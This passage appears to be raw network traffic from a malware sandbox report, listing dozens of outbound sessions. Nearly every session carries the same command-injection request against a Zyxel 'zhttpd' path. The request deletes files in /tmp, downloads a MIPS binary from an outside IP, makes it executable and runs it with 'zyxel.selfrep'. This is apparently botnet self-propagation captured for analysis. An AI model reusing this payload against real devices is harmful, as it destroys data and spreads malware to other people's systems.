                        Mar 12, 2024 08:50:37.177113056 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2548192.168.2.143374274.249.76.159443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177165985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2549192.168.2.14517829.139.142.194443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177200079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2550192.168.2.1434956168.203.218.218443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177247047 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2551192.168.2.1436164118.123.82.222443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177303076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2552192.168.2.145911220.247.147.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177349091 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2553192.168.2.145551480.214.91.199443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177396059 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2554192.168.2.1453926161.59.28.166443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177428007 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2555192.168.2.145317891.247.85.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177474976 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2556192.168.2.1443424132.160.45.225443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177524090 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2557192.168.2.1433048195.77.47.170443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177570105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2558192.168.2.145207671.124.118.147443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177597046 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2559192.168.2.1445648183.228.234.116443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177644968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2560192.168.2.144571876.20.222.95443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177707911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2561192.168.2.145459678.6.217.233443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177731991 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2562192.168.2.1458646122.31.221.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177747965 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2563192.168.2.144627851.203.66.139443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177794933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2564192.168.2.14518949.164.254.251443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177839994 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2565192.168.2.1444312191.91.127.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177881002 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2566192.168.2.1459072205.193.188.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177921057 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2567192.168.2.1443704101.74.176.177443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.177978039 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2568192.168.2.1449100125.63.146.39443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178004026 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2569192.168.2.1437746141.189.229.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178050995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2570192.168.2.144063245.8.3.0443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178092957 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2571192.168.2.1458812153.215.247.183443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178150892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2572192.168.2.1441588185.97.32.252443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178198099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2573192.168.2.1460858147.66.159.31443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178247929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2574192.168.2.1451534154.151.17.205443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178301096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2575192.168.2.1434670169.198.250.214443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178329945 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2576192.168.2.1455696194.62.22.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178364992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2577192.168.2.1435012136.98.193.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178389072 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2578192.168.2.14331644.127.171.230443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178430080 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2579192.168.2.14431945.106.226.208443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178488016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2580192.168.2.143915686.188.77.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178539038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2581192.168.2.14416802.57.48.31443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178570986 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2582192.168.2.145825070.243.227.184443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178618908 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2583192.168.2.1445794167.220.206.16443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178678036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2584192.168.2.144939288.204.142.34443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178708076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2585192.168.2.1439596149.144.73.30443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178752899 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2586192.168.2.143494675.212.84.22443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178817034 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2587192.168.2.1438360207.230.219.224443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178850889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2588192.168.2.1460070108.153.131.227443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178880930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2589192.168.2.1442828153.194.57.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178937912 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2590192.168.2.1457386152.219.240.3443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.178970098 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2591192.168.2.144175835.63.246.14443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179022074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2592192.168.2.1448088144.63.220.141443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179064989 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2593192.168.2.145120693.100.236.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179094076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2594192.168.2.14414122.33.9.173443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179133892 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2595192.168.2.14346889.14.151.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179174900 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2596192.168.2.145631461.123.192.240443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179233074 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2597192.168.2.144095638.209.160.178443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179275036 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2598192.168.2.143293023.110.136.206443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179347038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2599192.168.2.1439920113.182.24.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179378033 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2600192.168.2.1440628203.189.206.103443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179425001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2601192.168.2.144552212.36.30.161443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179441929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2602192.168.2.145680464.182.196.112443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179497004 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2603192.168.2.145673470.203.154.212443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179558992 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2604192.168.2.145585669.119.32.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179605961 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2605192.168.2.1435330153.72.94.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179632902 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2606192.168.2.145127672.25.20.40443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179691076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2607192.168.2.144675462.15.13.8443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179749012 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2608192.168.2.144535249.174.231.209443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179801941 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2609192.168.2.144117612.38.203.228443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179841995 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2610192.168.2.1452046208.99.24.4443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179897070 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2611192.168.2.1455266195.36.99.189443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179925919 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2612192.168.2.1459768103.23.68.171443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.179984093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2613192.168.2.1451902221.54.42.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180037022 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2614192.168.2.1439906122.184.232.28443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180066109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2615192.168.2.1454104210.161.214.108443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180125952 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2616192.168.2.1447874158.44.177.156443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:37.180171967 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        2617192.168.2.144384812.225.23.119443
